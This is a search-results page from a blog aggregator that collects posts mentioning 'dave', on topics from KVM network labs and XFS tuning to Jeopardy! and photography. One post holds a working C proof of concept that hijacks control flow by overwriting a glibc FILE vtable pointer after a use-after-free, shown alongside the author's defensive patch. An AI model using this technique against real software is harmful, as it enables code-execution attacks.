Search Results: "dave"

5 November 2012

MJ Ray: Seize the Media! @theBoyler @coopsutd


1 Angel Square

So when I arrived on Thursday (ten minutes early despite a cancelled train, thanks to help from the cooperative fellow traveller mentioned last post), I was in time to go to a workshop on media cooperatives led by @theBoyler. It wasn t what I expected. It seemed to concentrate on the opportunity presented by the current awful state of news media companies in many countries and the technology-driven changes to their businesses. For example, WordPress is a viable way to start online first, then move into print later. There are already news co-ops in places where there would be no local news media. The challenge well be how to overcome what I d call spoiling or scorched earth tactics from departing media companies. Some local news media owners are looking for a way out. One obvious one is to turn a local title into a minor variation on a regional-or-worse service or publication, maybe by selling it to a bigger media business. That loses some audience but many will put up with it, so it avoids creating an obvious gap in the market for more truly local reporting. Much else was covered and the audience suggested tons of examples. I m not sure we reached many firm conclusions, but there seem quite a few examples to learn from (Morning Star, taz, ) and Dave Boyle s work is continuing

20 October 2012

Vincent Bernat: Network lab with KVM

To experiment with network stuff, I was using UML-based network labs. Many alternatives exist, like GNS3, Netkit, Marionnet or Cloonix. All of them are great viable solutions but I still prefer to stick to my minimal home-made solution with UML virtual machines. Here is why: The use of UML had some drawbacks: However, UML features HostFS, a filesystem providing access to any part of the host filesystem. This is the killer feature which allows me to not use any virtual disk image and to get access to my home directory right from the guest. I discovered recently that KVM provided 9P, a similar filesystem on top of VirtIO, the paravirtualized IO framework.

Setting up the lab The setup of the lab is done with a single self-contained shell file. The layout is similar to what I have done with UML. I will only highlight here the most interesting steps.

Booting KVM with a minimal kernel My initial goal was to experiment with Nicolas Dichtel s IPv6 ECMP patch. Therefore, I needed to configure a custom kernel. I have started from make defconfig, removed everything that was not necessary, added what I needed for my lab (mostly network stuff) and added the appropriate options for VirtIO drivers:
No modules. Grab the complete configuration if you want to have a look. From here, you can start your kernel with the following command ($LINUX is the appropriate bzImage):
kvm \
  -m 256m \
  -display none \
  -nodefconfig -no-user-config -nodefaults \
  -chardev stdio,id=charserial0,signal=off \
  -device isa-serial,chardev=charserial0,id=serial0 \
  -chardev socket,id=con0,path=$TMP/vm-$name-console.pipe,server,nowait \
  -mon chardev=con0,mode=readline,default \
  -kernel $LINUX \
  -append "init=/bin/sh console=ttyS0"
Of course, since there is no disk to boot from, the kernel will panic when trying to mount the root filesystem. KVM is configured to not display video output (-display none). A serial port is defined and uses stdio as a backend1. The kernel is configured to use this serial port as a console (console=ttyS0). A VirtIO console could have been used instead but it seems this is not possible to make it work early in the boot process. The KVM monitor is setup to listen on an Unix socket. It is possible to connect to it with socat UNIX:$TMP/vm-$name-console.pipe -.

Initial ramdisk UPDATED: I was initially unable to mount the host filesystem as the root filesystem for the guest directly by the kernel. In a comment, Josh Triplett told me to use /dev/root as the mount tag to solve this problem. I keep using an initrd in this post but the lab on Github has been updated to not use one. Here is how to build a small initial ramdisk:
# Setup initrd
    info "Build initrd"
    mkdir -p $DESTDIR
    # Setup busybox
    copy_exec $($WHICH busybox) /bin/busybox
    for applet in $($ DESTDIR /bin/busybox --list); do
        ln -s busybox $ DESTDIR /bin/$ applet 
    # Setup init
    cp $PROGNAME $ DESTDIR /init
    cd "$ DESTDIR " && find .   \
       cpio --quiet -R 0:0 -o -H newc   \
       gzip > $TMP/initrd.gz
The copy_exec function is stolen from the initramfs-tools package in Debian. It will ensure that the appropriate libraries are also copied. Another solution would have been to use a static busybox. The setup script is copied as /init in the initial ramdisk. It will detect it has been invoked as such. If it was omitted, a shell would be spawned instead. Remove the cp call if you want to experiment manually. The flag -initrd allows KVM to use this initial ramdisk.

Root filesystem Let s mount our root filesystem using 9P. This is quite easy. First KVM needs to be configured to export the host filesystem to the guest:
kvm \
  -fsdev local,security_model=passthrough,id=fsdev-root,path=$ ROOT ,readonly \
  -device virtio-9p-pci,id=fs-root,fsdev=fsdev-root,mount_tag=rootshare
$ ROOT can either be / or any directory containing a complete filesystem. Mounting it from the guest is quite easy:
mkdir -p /target/ro
mount -t 9p rootshare /target/ro -o trans=virtio,version=9p2000.u
You should find a complete root filesystem inside /target/ro. I have used version=9p2000.u instead of version=9p2000.L because the later does not allow a program to mount() a host mount point2. Now, you have a read-only root filesystem (because you don t want to mess with your existing root filesystem and moreover, you did not run this lab as root, did you?). Let s use an union filesystem. Debian comes with AUFS while Ubuntu and OpenWRT have migrated to overlayfs. I was previously using AUFS but got errors on some specific cases. It is still not clear which one will end up in the kernel. So, let s try overlayfs. I didn t find any patchset ready to be applied on top of my kernel tree. I was working with David Miller s net-next tree. Here is how I have applied the overlayfs patch on top of it:
$ git remote add torvalds git://
$ git fetch torvalds
$ git remote add overlayfs git://
$ git fetch overlayfs
$ git merge-base overlayfs.v15 v3.6
$ git checkout -b net-next+overlayfs
$ git cherry-pick 4cbe5a555fa58a79b6ecbb6c531b8bab0650778d..overlayfs.v15
Don t forget to enable CONFIG_OVERLAYFS_FS in .config. Here is how I configured the whole root filesystem:
info "Setup overlayfs"
mkdir /target
mkdir /target/ro
mkdir /target/rw
mkdir /target/overlay
# Version 9p2000.u allows to access /dev, /sys and mount new
# partitions over them. This is not the case for 9p2000.L.
mount -t 9p        rootshare /target/ro      -o trans=virtio,version=9p2000.u
mount -t tmpfs     tmpfs     /target/rw      -o rw
mount -t overlayfs overlayfs /target/overlay -o lowerdir=/target/ro,upperdir=/target/rw
mount -n -t proc  proc /target/overlay/proc
mount -n -t sysfs sys  /target/overlay/sys
info "Mount home directory on /root"
mount -t 9p homeshare /target/overlay/root -o trans=virtio,version=9p2000.L,access=0,rw
info "Mount lab directory on /lab"
mkdir /target/overlay/lab
mount -t 9p labshare /target/overlay/lab -o trans=virtio,version=9p2000.L,access=0,rw
info "Chroot"
export STATE=1
cp "$PROGNAME" /target/overlay
exec chroot /target/overlay "$PROGNAME"
You have to export your $ HOME and the lab directory from host:
kvm \
  -fsdev local,security_model=passthrough,id=fsdev-root,path=$ ROOT ,readonly \
  -device virtio-9p-pci,id=fs-root,fsdev=fsdev-root,mount_tag=rootshare \
  -fsdev local,security_model=none,id=fsdev-home,path=$ HOME  \
  -device virtio-9p-pci,id=fs-home,fsdev=fsdev-home,mount_tag=homeshare \
  -fsdev local,security_model=none,id=fsdev-lab,path=$(dirname "$PROGNAME") \
  -device virtio-9p-pci,id=fs-lab,fsdev=fsdev-lab,mount_tag=labshare

Network You know what is missing from our network lab? Network setup. For each LAN that I will need, I spawn a VDE switch:
# Setup a VDE switch
    info "Setup switch $1"
    screen -t "sw-$1" \
        start-stop-daemon --make-pidfile --pidfile "$TMP/switch-$" \
        --start --startas $($WHICH vde_switch) -- \
        --sock "$TMP/switch-$1.sock"
    screen -X select 0
To attach an interface to the newly created LAN, I use:
mac=$(echo $name-$net   sha1sum   \
            awk ' print "52:54:" substr($1,0,2) ":" substr($1, 2, 2) ":" substr($1, 4, 2) ":" substr($1, 6, 2) ')
kvm \
  -net nic,model=virtio,macaddr=$mac,vlan=$net \
  -net vde,sock=$TMP/switch-$net.sock,vlan=$net
The use of a VDE switch allows me to run the lab as a non-root user. It is possible to give Internet access to each VM, either by using -net user flag or using slirpvde on a special switch. I prefer the latest solution since it will allow the VM to speak to each others.

Debugging This lab was mostly done to debug both the kernel and Quagga. Each of them can be debugged remotely.

Kernel debugging While the kernel features KGDB, its own debugger, compatible with GDB, it is easier to use the remote GDB server built inside KVM.
kvm \
  -gdb unix:$TMP/vm-$name-gdb.pipe,server,nowait
To connect to the remote GDB server from the host, first locate the vmlinux file at the root of the source tree and run GDB on it. The kernel has to be compiled with CONFIG_DEBUG_INFO=y to get the appropriate debugging symbols. Then, use socat with the Unix socket to attach to the remote debugger:
$ gdb vmlinux
GNU gdb (GDB) 7.4.1-debian
Reading symbols from /home/bernat/src/linux/vmlinux...done.
(gdb) target remote   socat UNIX:$TMP/vm-$name-gdb.pipe -
Remote debugging using   socat UNIX:/tmp/tmp.W36qWnrCEj/vm-r1-gdb.pipe -
native_safe_halt () at /home/bernat/src/linux/arch/x86/include/asm/irqflags.h:50
You can now set breakpoints and resume the execution of the kernel. It is easier to debug the kernel if optimizations are not enabled. However, it is not possible to disable them globally. You can however disable them for some files. For example, to debug net/ipv6/route.c, just add CFLAGS_route.o = -O0 to net/ipv6/Makefile, remove net/ipv6/route.o and type make.

Userland debugging To debug a program inside KVM, you can just use gdb as usual. Your $HOME directory is available and it should be therefore straightforward. However, if you want to perform some remote debugging, that s quite easy. Add a new serial port to KVM:
kvm \
  -chardev socket,id=charserial1,path=$TMP/vm-$name-serial.pipe,server,nowait \
  -device isa-serial,chardev=charserial1,id=serial1
Starts gdbserver in the guest:
$ libtool execute gdbserver /dev/ttyS1 zebra/zebra
Process /root/code/orange/quagga/build/zebra/.libs/lt-zebra created; pid = 800
Remote debugging using /dev/ttyS1
And from the host, you can attach to the remote process:
$ libtool execute gdb zebra/zebra
GNU gdb (GDB) 7.4.1-debian
Reading symbols from /home/bernat/code/orange/quagga/build/zebra/.libs/lt-zebra...done.
(gdb) target remote   socat UNIX:/tmp/tmp.W36qWnrCEj/vm-r1-serial.pipe
Remote debugging using   socat UNIX:/tmp/tmp.W36qWnrCEj/vm-r1-serial.pipe
Reading symbols from /lib64/ debugging symbols found)...done.
Loaded symbols for /lib64/
0x00007ffff7dddaf0 in ?? () from /lib64/

Demo For a demo, have a look at the following video (it is also available as an Ogg Theora video).
<iframe frameborder="0" height="270" src="" width="480"></iframe>

  1. stdio is configured such that signals are not enabled. KVM won t stop when receiving SIGINT. This is important for the usage we want to have.
  2. Therefore, it is not possible to mound a fresh /proc on top of the existing one. I have searched a bit but didn t find why. Any comments on this is welcome.

18 August 2012

David Welton: Simple phone alerts with Gmail and Android

I have some long running server processes that I am going to launch soonish, and I want to be alerted when they're done. Using Gmail and Android, it's pretty easy:
  1. In Gmail, set up a new label, "Alerts" or something like that.
  2. Set up a filter in Gmail that matches messages along the lines of, and adds the Alerts label, does not skip the inbox and are always marked as important.
  3. Now, on your Android phone, in Gmail -> Settings -> Account settings (select the account) -> Sync inboxes and labels, and select your Alerts label.
  4. Then, go back and select Labels to Notify in settings, select "Alerts", and add it to "Notify in Status bar", select an appropriate ringtone, set vibrate to 'always', and deselect 'Notify once' - because we want to be notified any time an alert comes in.
That should do it - on your server, set up an alias in something like /etc/aliases that redirects email from the alert alias - codered in this case - to your own email address. Now, you can script alerts that will get their own ringtone on your phone like so: echo "Dave, I can't let you do that" mail -s "Warning, computer malfunction" Pretty simple and effective if you need a simple way for your computer to let you know that it needs attention right now.

10 July 2012

Keith Packard: hotplug-displaylink

Getting Hotplugging working with a DisplayLink USB to DVI adapter I merged Dave Airlie s randr provider patches to the server and pushed them out in preparation for freezing the X server for the version 1.13 release. Before freezing, I figured I should at least test hotplugging my DisplayLink adapter. Well, that took all day Sources For the impatient, here s where all of the bits are. These work on my machine. Upstream bits:
  1. randrproto. git:// master
Bits from Dave Airlie s trees:
  1. libdrm. git:// prime
  2. libXrandr. git:// prime
  3. xrandr. git:// prime
  4. xf86-video-intel. git:// prime
Bits from my trees:
  1. xf86-video-modesetting. git:// prime
  2. kernel. git:// prime
  3. X server. git:// master
Kernel adventures The 3.5-rc6 bits have all of the necessary driver changes to support DisplayLink hot-plug. At least, they do if you re not running 32-bit user space atop a 64-bit kernel. If you are, then most of the DRM drivers don t work at all they re missing the .compat_ioctl entry in the file_operations structure, which makes all ioctl calls return -ENOTTY. In particular, the udl driver is missing this entry, so when you plug in the device, the server tries to talk to it and nothing works. X server adventures Once I got the kernel working, I discovered some nice crashing behaviour in the X server. If I started the server with the DisplayLink device plugged in, as soon as I tried to enable the output, the server would segfault. Turns out this cases requires special code in the server to ensure that the DisplayLink screen privates are adjust correctly while the intel driver loads. Modesetting driver fixup The modesetting driver was missing a rename that happened to a structure member in the last couple of days. I d bet Dave has the same patch sitting on a disk somewhere. xrandr changes The command line additions to xrandr are sufficient to get this stuff working, but I think it could use some improvements to make the interface a bit friendlier. In particular, requiring you to use XIDs to identify providers is a bit harsh. Schedules I ll be pushing the X server changes out this evening; review would be appreciated, but I don t think any of the patches I made there are scary. I sent the kernel patches necessary to lkml, but with Dave in transit, I m not sure who is minding the store. As for the rest of the bits, they re sitting in Dave s repositories, presumably they ll get pushed upstream soon. But, does it actually work? Almost. Everything says it s working, but I m not getting any signal to my DVI monitor. My DisplayLink device is ancient, and the kernel complains about it, saying
[drm:udl_parse_vendor_descriptor] *ERROR* Unrecognized vendor firmware descriptor".
So close, and yet

26 June 2012

Ingo Juergensmann: Confusion about mkfs.xfs and log stripe size being too big

Recently I bought some new disks, placed them into my computer, and built a RAID5 on these 3x 4 TB disks. Creating a physical device (PV) with pvcreate, a volume group (VG) with vgcreate and some logical volumes (LV) with lvcreate was as easy and well-known as creating an XFS filesystem on the LVs... but something was strange! I never saw this message before, when creating XFS filesystems with mkfs.xfs:
log stripe unit (524288 bytes) is too large (maximum is 256KiB)
log stripe unit adjusted to 32KiB
Usually I don't mess around with the parameters of mkfs.xfs, because mkfs.xfs is smart enough to find near to optimal parameters for your filesystem. But apparently mkfs.xfs wanted to use a log stripe unit of 512 kiB, although its maximum size for this is 256 kiB. Why? So I started to google and in parallel asked on #xfs@freenode. Erik Sandeen, one of the core developers of XFS, suggested that I write that issue to the mailing list. He did already face this issue himself, but couldn't remember details. So I collected some more information about my setup and wrote to the XFS ML. Of course I included information about my RAID5 setup:
muaddib:/home/ij# mdadm --detail /dev/md7
Version : 1.2
Creation Time : Sun Jun 24 14:58:21 2012
Raid Level : raid5
Array Size : 7811261440 (7449.40 GiB 7998.73 GB)
Used Dev Size : 3905630720 (3724.70 GiB 3999.37 GB)
Raid Devices : 3
Total Devices : 3
Persistence : Superblock is persistent Update Time : Tue Jun 26 05:13:03 2012
State : active, resyncing
Active Devices : 3
Working Devices : 3
Failed Devices : 0
Spare Devices : 0 Layout : left-symmetric
Chunk Size : 512K Resync Status : 98% complete Name : muaddib:7 (local to host muaddib)
UUID : b56a714c:d193231e:365e6297:2ca61b65
Events : 16 Number Major Minor RaidDevice State
0 8 52 0 active sync /dev/sdd4
1 8 68 1 active sync /dev/sde4
2 8 84 2 active sync /dev/sdf4
Apparently, mkfs.xfs takes the chunk size of the RAID5 and want to use this for its log stripe size setting. So, that's the explanation why mkfs.xfs wants to use 512 kiB, but why is the chunk size 512 kiB at all? I didn't messed around with chunk sizes when creating the RAID5 either and all of my other RAIDs are using chunk sizes of 64 kiB. The reason was quickly found: the new RAID5 has a 1.2 format superblock, whereas the older ones do have a 0.90 format superblock. So, it seems that somewhen the default setting in mdadm, which superblock format is to be used for its metadata, has been changed. I asked on and someone answered that this was changed in Debian after release of Squeeze. Even in Squeeze the 0.90 format superblock was obsolete and has been only kept for backward compatibility. Well, ok. There actually was a change of defaults, which explains the behaviour of mkfs.xfs now, wanting to set log stripe size to 512 kiB. But what is the impact of falling back to 32 kiB log stripe size? Dave Chinner, another XFS developer explains:
Best thing in general is to align all log writes to the
underlying stripe unit of the array. That way as multiple frequent
log writes occur, it is guaranteed to form full stripe writes and
basically have no RMW overhead. 32k is chosen by default because
that's the default log buffer size and hence the typical size of
log writes.

If you increase the log stripe unit, you also increase the minimum
log buffer size that the filesystem supports. The filesystem can
support up to 256k log buffers, and hence the limit on maximum log
stripe alignment.
And in another mail, when being asked if it's possible to raise the 256 kiB limit to 512 kiB because of the mdadm defaults to 512 kiB as well:
You can't, simple as that. The maximum supported is 256k. As it is,
a default chunk size of 512k is probably harmful to most workloads -
large chunk sizes mean that just about every write will trigger a
RMW cycle in the RAID because it is pretty much impossible to issue
full stripe writes. Writeback doesn't do any alignment of IO (the
generic page cache writeback path is the problem here), so we will
lamost always be doing unaligned IO to the RAID, and there will be
little opportunity for sequential IOs to merge and form full stripe
writes (24 disks @ 512k each on RAID6 is a 11MB full stripe write).

IOWs, every time you do a small isolated write, the MD RAID volume
will do a RMW cycle, reading 11MB and writing 12MB of data to disk.
Given that most workloads are not doing lots and lots of large
sequential writes this is, IMO, a pretty bad default given typical
RAID5/6 volume configurations we see....
So, reducing the log stripe size is in fact a good thing[TM]. If anyone will benefit from larger log stripe sizes, s/he would be knowledgeable enough to play around with mkfs.xfs parameters and tune them to needs of the workload. Erik Sandeen suggested, though, to remove the warning in mkfs.xfs. Dave objects and maybe it's a good compromise to extend the warning by giving an URL for a FAQ entry explaining this issue in more depth than a short warning can do? Maybe someone else is facing the same issue and searches for information and find this blog entry helpful in the meantime...

24 June 2012

Russell Coker: Targeted Advertising

Don Marti has written another blog post about targeted advertising [1]. His main point is that when a company uses the most targeted adverts (such as Google advertising) everyone knows that they are paying a small number of cents per click and nothing for the people who don t click. This compares to TV adverts which cost a lot of money and for which most viewers either leave the room or use fast-forward. Therefore using Google adverts doesn t send a signal about the amount of money invested in the products. Don also cited an example of a company sponsoring an OK Go film clip, that was a great idea, it shows that the company can do expensive things which are also a bit creative and fans will thank them (watch all the OK Go videos on Youtube, they are great). The next question is how else companies can advertise? One thing I d really like to see is sponsorship of authors. Pick an author and pay them a salary with paid editorial services for releasing a book a year for free in HTML and ebook formats. Having a fixed salary is a significant benefit when it comes time to apply for a mortgage or plan a holiday and being able to freely distribute books would be a significant benefit for an author who hasn t got a large fan base. In the computer industry it seems that there s a lot of potential for sponsoring people who produce free things. That ranges from free software and designs for free hardware to blog posts and documentation. Five years ago Sun had a blogging contest and my friend Dave Hall won a server that was worth $21K [2]. It would be nice if some other companies started doing similar things and if Sun did a repeat so some other people I like could get some free kit. Related posts:
  1. What is Appropriate Advertising? Colin Charles writes about a woman who is selling advertising...
  2. Advertising Free Software Projects Today I just noticed the following advert on one of...
  3. Friends and Adverts For some time I have been running Google Adsense adverts...

5 January 2012

Jaldhar Vyas: Jeopardy!: The Post-Mortem

By now hopefully you got a chance to see my Jeopardy! episode so it won't be much of a spoiler to mention that I didn't win. It went like this. I flew into LA on the night of October 31st. The taping was to take place on the next two days. Jeopardy! tapes two weeks of shows, two days a week for a total of 10 episodes. Contestants are randomly chosen for one of those 10 episodes but you don't find out which one you will be on until the last minute. Randomness and secrecy have become become a big part of the production process in games since the quiz show scandals of the 1950s. (Interesting fact: it is a Federal felony to tamper with a TV game show.) There were a group of just under 20 0f us altogether waiting to go on. All very nice people. Here in the New York area one tends to equate very intelligent people with "Type A" personalities but we got on well together. Interspersed between the tapings, we had short practice sessions to familiarize ourselves with the studio setup and this is where I first started getting a little apprehensive. Jeopardy! is not just about general knowledge, there is a physical element too in that you have to buzz in by pressing a button on a stick which is wired up to some producers console. You can't buzz in before Alex has finished reading the question and obviously you can't buzz in if someone is already answering the question. If you buzz at the wrong time, your buzzer locks for 0.75 seconds so just jamming your finger on the button. I didn't even get that far as on the entire first day I failed to buzz in at all despite changing hands, changing grip different ways and other strategies. I was pretty despondent by the second day but then miraculously I managed to get the hang of it. So when I was finally selected (for the 3rd game of that day.) I was back to my usual cool self. I was up against Dave Leach and Nicholas Campiz who were returning after having tied in the previous game. And the game did start well enough. Oh one thing you may notice is that Alex mispronounces my name Jaldhal. I knew he did that once or twice and even mentioned it to a producer but it was only viewing the episode right now that I see he does it consistently. I assumed such things would be fixed up in post-editting but I guess not. Oh well, after living in this country for so many years I've learned to be happy whenever two consonants are more or less in the right place. This particular mispronunciation is actually fairly common, even Indian people have been known to make it. The alternative theory is that Alex couldn't read my horrible handwriting which is also plausible. Anyway, I digress. I started off fairly well. My first mistake was in a category about alcoholic drinks. I answered vermouth when the correct response was gin. In my defense I'm a strict teetoler so none of these words mean anything to me. I also earned the disapproval of my superhero fan son by mistaking Dr. Strange for Dr. Doom. I did get the one about Spiderman villain Dr. Octopus so that mollified him somewhat. The highlight of my evening was strangely enough in a category about books of the Bible. I got a Daily Double. It was a risky move but I have always wanted to make a "true" daily double so I threw caution to the winds and wagered everything I had. To my surprise as much as anyones, got the answer right doubling my score. I was in a pretty good position for the Double Jeopardy but thats when Dave started dominating. If you haven't been watching previous games, Dave Leach is arguably the best player this season. Not only is he smart but he is almost supernaturally fast on the buzzer. You can't see because I kept my hands behind the podium but I again and again I would desperately try to ring in on a question I knew the answer to only to be beaten to the punch by Dave. This caused me to start getting a bit reckless and answering questions where I was less than certain which cost me dearly. One particularly dumb mistake was in a category where all the answers were supposed to start with the letter g. I said compass when I should said gyrocompass but actually I should have left that category alone entirely. By the time Final Jeopardy came around winning was no longer an option as Dave was too far in the lead. I was slightly ahead of Nicholas in 2nd place. This is where I again made a strategic error. My original plan to bet nothing in Final Jeopardy but the category was "1930s Novels" and I liked my chances. The clue was read out and it involved an anti-war novel whose author was blacklisted. I was elated. It had to be "All Quiet on the Western Front" right? The blacklist bit gave me pause as the author Erich Maria Remarque was German and this was obviously a reference to the anti-Communist blacklist in the 1950s USA. But somehow I remembered that he had spent the end of his life in Hollywood or maybe I just convinced myself that it was plausible. Evidently my thought process wasn't too crazy because all three of us came up with the same answer. All three of us were wrong. The correct answer was "Johnny Got His Gun" by Daltan Trumbo. In hindsight I knew this but it illustrates the strange ways the mind works. I knew because the video for Metallicas song "One" from "...And Justice for All" is based on the film adaptation of this book. However in a previous orientation session the lady who is the contestant coordinator for Jeopardy! had mentioned AQOTHWF as anexample of something and this got stuck in my brain crowding out the previously known fact. So when all was said and done I ended up in 3rd place. (I bet big whereas Nicholas was more conservative.) Oh well. Despite not winning I had a blast. I fulfilled my dream of appearing on Jeopardy! I met Alex Trebek. (And I should be receiving an autographed picture of us together soon.) My witty banter was sufficiently witty. I made enough money to cover my travel expenses and still have a nice amount left. And I got to meet lots of interesting and wonderful people. So I'm satisfied.

23 December 2011

Kees Cook: abusing the FILE structure

When attacking a process, one interesting target on the heap is the FILE structure used with stream functions (fopen(), fread(), fclose(), etc) in glibc. Most of the FILE structure (struct _IO_FILE internally) is pointers to the various memory buffers used for the stream, flags, etc. What s interesting is that this isn t actually the entire structure. When a new FILE structure is allocated and its pointer returned from fopen(), glibc has actually allocated an internal structure called struct _IO_FILE_plus, which contains struct _IO_FILE and a pointer to struct _IO_jump_t, which in turn contains a list of pointers for all the functions attached to the FILE. This is its vtable, which, just like C++ vtables, is used whenever any stream function is called with the FILE. So on the heap, we have: glibc FILE vtable location In the face of use-after-free, heap overflows, or arbitrary memory write vulnerabilities, this vtable pointer is an interesting target, and, much like the pointers found in setjmp()/longjmp(), atexit(), etc, could be used to gain control of execution flow in a program. Some time ago, glibc introduced PTR_MANGLE/PTR_DEMANGLE to protect these latter functions, but until now hasn t protected the FILE structure in the same way. I m hoping to change this, and have introduced a patch to use PTR_MANGLE on the vtable pointer. Hopefully I haven t overlooked something, since I d really like to see this get in. FILE structure usage is a fair bit more common than setjmp() and atexit() usage. :) Here s a quick exploit demonstration in a trivial use-after-free scenario:
#include <stdio.h>
#include <stdlib.h>
void pwn(void)
    printf("Dave, my mind is going.\n");
void * funcs[] =  
    NULL, // "extra word"
    NULL, // DUMMY
    exit, // finish
    NULL, // overflow
    NULL, // underflow
    NULL, // uflow
    NULL, // pbackfail
    NULL, // xsputn
    NULL, // xsgetn
    NULL, // seekoff
    NULL, // seekpos
    NULL, // setbuf
    NULL, // sync
    NULL, // doallocate
    NULL, // read
    NULL, // write
    NULL, // seek
    pwn,  // close
    NULL, // stat
    NULL, // showmanyc
    NULL, // imbue
int main(int argc, char * argv[])
    FILE *fp;
    unsigned char *str;
    printf("sizeof(FILE): 0x%x\n", sizeof(FILE));
    /* Allocate and free enough for a FILE plus a pointer. */
    str = malloc(sizeof(FILE) + sizeof(void *));
    printf("freeing %p\n", str);
    /* Open a file, observe it ended up at previous location. */
    if (!(fp = fopen("/dev/null", "r")))  
        return 1;
    printf("FILE got %p\n", fp);
    printf("_IO_jump_t @ %p is 0x%08lx\n",
           str + sizeof(FILE), *(unsigned long*)(str + sizeof(FILE)));
    /* Overwrite vtable pointer. */
    *(unsigned long*)(str + sizeof(FILE)) = (unsigned long)funcs;
    printf("_IO_jump_t @ %p now 0x%08lx\n",
           str + sizeof(FILE), *(unsigned long*)(str + sizeof(FILE)));
    /* Trigger call to pwn(). */
    return 0;
Before the patch:
$ ./mini
sizeof(FILE): 0x94
freeing 0x9846008
FILE got 0x9846008
_IO_jump_t @ 0x984609c is 0xf7796aa0
_IO_jump_t @ 0x984609c now 0x0804a060
Dave, my mind is going.
After the patch:
$ ./mini
sizeof(FILE): 0x94
freeing 0x9846008
FILE got 0x9846008
_IO_jump_t @ 0x984609c is 0x3a4125f8
_IO_jump_t @ 0x984609c now 0x0804a060
Segmentation fault
Astute readers will note that this demonstration takes advantage of another characteristic of glibc, which is that its malloc system is unrandomized, allowing an attacker to be able to determine where various structures will end up in the heap relative to each other. I d like to see this fixed too, but it ll require more time to study. :)

2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

7 August 2011

Asheesh Laroia: Women, men, and accidentally being a jerk (at the Desktop Summit)

The first day of the Desktop Summit was yesterday, Saturday, August 6. I loved it and gave a presentation. There are two very different stories I can tell on the topic of gender equality in free software. I'll start with the bad.
It's pretty easy, in the U.S. at least, to get people of privilege to stop using terms that evoke centuries of oppression from slavery. It's harder to ask people to stop doing that to women. I'm writing this post to ask for that. There were two different times that people I generally respect used words that historically have been used to hurt and minimize women. "Cygnus Solutions is prostitutes." Dave Neary was delivering a talk (that I found impressively informative) called, "The cost of going it alone". When the talk covered the cost (in time and money) of getting your corporation's code into the community branch of an open-source project, he pointed out you could hire someone with the skills. Cygnus was the go-to company for that in the 1990s; to explain that Cygnus does not care who they work for, he said the sentence in bold. "The OpenSuSE Build Service is a slut." I was at a party at a hackerspace last night. Someone who I admire for his work in free in free software, both technical and community, was joking with me about that no one should compile (or use) GTK. I riffed on the joke and remarked, "The OpenSuSE build service will build anything." He replied with the sentence in bold. "Slut" and "prostitute" are terms that recall the objectification of women. They're terms that attempt to measure a woman's worth as a sex object. It's not nice to the many women in attendance to bring that up. You might not have thought this through. You might want to read one woman's take "On Sluts, Rape, and Fuckery". Give it a read. Then, give it a rest. The thing is, this matters all the time. That's why I have to call you two out on it. Now for the happy story.
While watching the Desktop Summit's intern showcase, I was floored. One hacker implemented Off-The-Record instant messaging for Telepathy. Another implemented pluggable back-ends for Getting Things GNOME, a task manager. I heard about overwhelming documentation and usability improvements to GNOME mainstays Cheese and Anjuta. In a short summer, these students made huge changes. For most of them, this was the first time they delivered any sort of presentation. Every single talk was delivered in earnest and enthusiasm. They told us about the work they had done and what might happen in the future. The other remarkable thing about the intern presentations was the demographics. I didn't keep count, but it seemed like as many women as men presented. We heard about hugely-important changes to documentation, code, and usability. People from central Europe, South Asia (yay), and Brazil took the stage. I hope that is the future of free software.
There are two things I want to see for our community. I want to know that people are respected and not reminded of centuries of oppression. I also want to see our community grow in size and diversity. I treat these issues as separate. We should choose respectful words when we speak not because we want more women to show up, but because it part of the expectation of decency that we should be able to expect from each other. And I failed the community when I did not make it clear there and then that this kind of language is not okay with me. It took me a day to understand this failure, so here I am writing this blog post. P.S. Thanks to Karen Rustad for her feedback while writing this post.

13 July 2011

Steve McIntyre: Project Harmony?

So, the "Harmony Project" launched their set of contributor agreements and tools last week. Colour me unimpressed... There's a claim on their website that they are a "community-centered group", but I don't see any list of people and organisations who contributed to this work. That bothers me. Regarding their aim to "assist organisations which use contribution agreements", I don't think that there is anything of value here for the Free Software community at all. Free Software developers don't need contribution agreements, and in my opinion encouraging their use like this is only going to cause further splintering of the community. We've managed for a very long time without them, why start now? As a developer, I personally don't believe in contribution agreements at all. If I contribute code to a project, it will be under the terms of a good Free Software license or not at all. That's all that's needed. There's a fair body of opinion out there on this - see pieces from Bradley Kuhn, Richard Fontana and Dave Neary for more discussion. What do you think?

13 June 2011

David Watson: Project 52 - Week 23 - Portrait of a Jedi

Played around taking a portrait of an "old" friend this week. Week 23 - Portrait of a Jedi

6 June 2011

David Watson: Project 52 - Week 22

Grabbed a shot of my brother's Pug trying to keep cool in the garden at the weekend. Week 22 - Cooling Down

29 May 2011

David Watson: Project 52 - Week 21

I happened to have some Arum Lillies on hand this week after taking some shots for use by a local funeral director. This is one of the shots I took once I had finished. Week 21 - Arum Lillies

22 May 2011

David Watson: Project 52 - Week 20

I grabbed my camera this week while waiting for the Formula 1 qualifying to start. The cats had made themselves comfortable on the couch, so I start taking a few shots. This shot is Mog looking unconcerned that that I was disturbing his rest. Week 20 - Mog

15 May 2011

David Watson: Project 52 - Week 19

Back indoors this week, took a shot of my wife, daughter and my own hands. I wanted an image for our bedroom wall that represented our family. Week 19 - Family

8 May 2011

David Watson: Project 52 - Week 18

As this week had another bank holiday, I took another trip out with the family. Here is a shot of Swallow Falls in Betws-y-Coed. While there I also shot some panoramic images of the falls which I may post later this week ( if it turns out ). Week 18 - Swallow Falls

1 May 2011

David Watson: Project 52 - Week 17

This week I have a shot I took while visiting Beeston Castle. This is the start of the path leading up to the castle itself. Week 17 - Path to the Castle

David Watson: Project 52 - Week 17

This week I have a shot I took while visiting Beeston Castle. This is the start of the path leading up to the castle itself. Week 17 - Path to the Castle

24 April 2011

David Watson: Project 52 - Week 16

Having a relaxing long weekend, thought I'd take a shot showing one of the ways I have being spending my time (other than photography of course). Week 16 - Taking a break

23 April 2011

Russell Coker: Links April 2011

